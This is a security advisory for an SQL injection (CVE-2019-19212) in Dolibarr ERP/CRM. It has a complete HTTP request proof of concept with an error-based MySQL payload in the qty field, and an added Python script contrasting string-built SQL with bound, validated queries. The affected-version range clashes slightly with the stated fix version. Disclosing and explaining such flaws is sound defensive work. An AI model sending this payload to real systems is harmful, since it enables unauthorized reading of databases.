usd-2019-0054 | Dolibarr ERP/CRM ver. 3.0 – 10.0.3


Advisory ID: usd-2019-0054
CVE Number: CVE-2019-19212
Affected Product: Dolibarr ERP/CRM
Affected Version: 3.0 – 10.0.3
Vulnerability Type: SQL injection
Security Risk: Critical
Vendor URL: https://www.dolibarr.org/
Vendor Status: Fixed (not verified)

Description

It is possible to execute arbitrary SQL commands by manipulating the qty parameter when editing a product's supplier price (action=updateprice) in /dolibarr/htdocs/product/fournisseurs.php. The value is used in a SQL statement without being validated as a number or bound as a parameter.

Proof of Concept (PoC)

PoC to read the current database user. The qty value is a URL-encoded, error-based MySQL injection: the subquery groups rows by a CONCAT() that includes FLOOR(RAND(0)*2), which makes MySQL raise a duplicate-entry error, and the error message returned to the client contains CURRENT_USER() between the marker strings 0x71767a7a71 and 0x7170767a71:

POST /dolibarr/htdocs/product/fournisseurs.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-DE
Accept-Encoding: gzip, deflate
Referer: http://localhost/dolibarr/htdocs/product/fournisseurs.php?id=1&action=add_price
Content-Type: application/x-www-form-urlencoded
Content-Length: 494
Cookie: DOLSESSID_d62fd6e735d72194222ef3c6d1021d7a=hltic273b6m378p7a1qrqf1b2d
Connection: close
Upgrade-Insecure-Requests: 1

token=%242y%2410%24TZJzw%2F3dPdYxPhcc.H1gF.JSduPMJyndwzgx1Bc7Wsd7XSGmOvgMe&action=updateprice&id_fourn=1&ref_fourn=1234&qty=%28SELECT%209354%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71767a7a71%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2C0x7170767a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29&tva_tx=0&price=123&price_base_type=HT&remise_percent=&delivery_time_days=&supplier_reputation=-1

Fix

It is recommended to use prepared statements and bind qty (and the other form values) as parameters instead of splicing them into the SQL text. Building SQL queries by hand is more error-prone and is what leads to vulnerabilities of this kind. A blacklist that tries to filter dangerous input is not recommended because of its complexity; where a field is supposed to be numeric, validating that it is a number (an allow-list check) is simpler and safer.
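The following Python script is an added example, not Dolibarr's code and not part of the original advisory. It serves both the PoC and the Fix above: it decodes the qty field from a constructed copy of the PoC request body, shows what a hand-built UPDATE statement looks like once that payload is concatenated in (the unsafe pattern the advisory describes, written as a hypothetical function), and then runs the same update against an in-memory SQLite table with bound parameters plus numeric validation. The table name and column names (product_fournisseur_price, fk_soc, ref_fourn, quantity, price) are assumptions chosen to mirror the form fields, not Dolibarr's real schema, and SQLite is used only because it runs offline; the injected subquery itself is MySQL-specific.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed copy of the POST body from the PoC request above. Only the
# qty parameter carries the injection; the other fields are plain form data.
POC_BODY = (
    "token=%242y%2410%24TZJzw%2F3dPdYxPhcc.H1gF.JSduPMJyndwzgx1Bc7Wsd7XSGmOvgMe"
    "&action=updateprice&id_fourn=1&ref_fourn=1234"
    "&qty=%28SELECT%209354%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71767a7a71%2C"
    "%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29"
    "%2C0x7170767a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS"
    "%20GROUP%20BY%20x%29a%29"
    "&tva_tx=0&price=123&price_base_type=HT&remise_percent=&delivery_time_days="
    "&supplier_reputation=-1"
)


def decode_qty(body: str) -> str:
    """Return the URL-decoded qty field of an application/x-www-form-urlencoded body."""
    return parse_qs(body)["qty"][0]


def build_query_unsafe(id_fourn, ref_fourn, qty, price) -> str:
    """Hypothetical hand-built UPDATE in the style the advisory warns about.
    This is not Dolibarr's code; it only reproduces the unsafe concatenation
    pattern so the effect of the qty payload is visible in the final SQL."""
    return (
        "UPDATE product_fournisseur_price SET quantity = " + str(qty)
        + ", price = " + str(price)
        + " WHERE fk_soc = " + str(id_fourn)
        + " AND ref_fourn = '" + str(ref_fourn) + "'"
    )


# Assumed schema for the demonstration (not Dolibarr's real table layout).
SCHEMA = """
CREATE TABLE product_fournisseur_price (
    fk_soc INTEGER, ref_fourn TEXT, quantity REAL, price REAL
);
INSERT INTO product_fournisseur_price VALUES (1, '1234', 1, 100);
"""


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def update_price_bound(conn, id_fourn, ref_fourn, qty, price):
    """Same UPDATE with every user value passed as a bound parameter.
    Whatever qty contains is stored as data and never parsed as SQL.
    Returns the quantity now stored for that row."""
    conn.execute(
        "UPDATE product_fournisseur_price SET quantity = ?, price = ? "
        "WHERE fk_soc = ? AND ref_fourn = ?",
        (qty, price, id_fourn, ref_fourn),
    )
    return conn.execute(
        "SELECT quantity FROM product_fournisseur_price "
        "WHERE fk_soc = ? AND ref_fourn = ?",
        (id_fourn, ref_fourn),
    ).fetchone()[0]


def update_price_validated(conn, id_fourn, ref_fourn, qty, price) -> int:
    """Bound parameters plus allow-list validation: qty and price must be
    numbers and id_fourn an integer. Anything else is rejected up front,
    which is what a blacklist of SQL keywords could never do reliably.
    Returns the number of rows updated."""
    try:
        qty_val = float(qty)
        price_val = float(price)
        id_val = int(id_fourn)
    except (TypeError, ValueError):
        raise ValueError("qty, price and id_fourn must be numeric")
    if qty_val <= 0 or price_val < 0:
        raise ValueError("qty must be positive and price non-negative")
    cur = conn.execute(
        "UPDATE product_fournisseur_price SET quantity = ?, price = ? "
        "WHERE fk_soc = ? AND ref_fourn = ?",
        (qty_val, price_val, id_val, str(ref_fourn)),
    )
    return cur.rowcount


if __name__ == "__main__":
    payload = decode_qty(POC_BODY)
    print("decoded qty:", payload)
    print("unsafe query:", build_query_unsafe(1, "1234", payload, 123))
    db = fresh_db()
    print("bound update stores:", update_price_bound(db, 1, "1234", payload, 123))
    try:
        update_price_validated(db, 1, "1234", payload, 123)
    except ValueError as e:
        print("validated update rejected:", e)
    print("rows updated with qty=10:", update_price_validated(db, 1, "1234", "10", "123"))
```

Running the script prints the decoded subquery, the concatenated UPDATE in which that subquery has become part of the statement, and then shows that with bound parameters the same payload is merely stored as a string, while the validated variant refuses it and accepts a plain numeric quantity.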

Timeline

  • 2019-09-06 Vulnerability discovered by Daniel Hoffmann
  • 2019-09-11 First contact with vendor
  • 2019-10-30 Vendor released version 10.0.3 which fixes the vulnerability (not verified)
  • 2020-02-05 Security advisory released

Credits

This security vulnerability was discovered by Daniel Hoffmann of usd AG.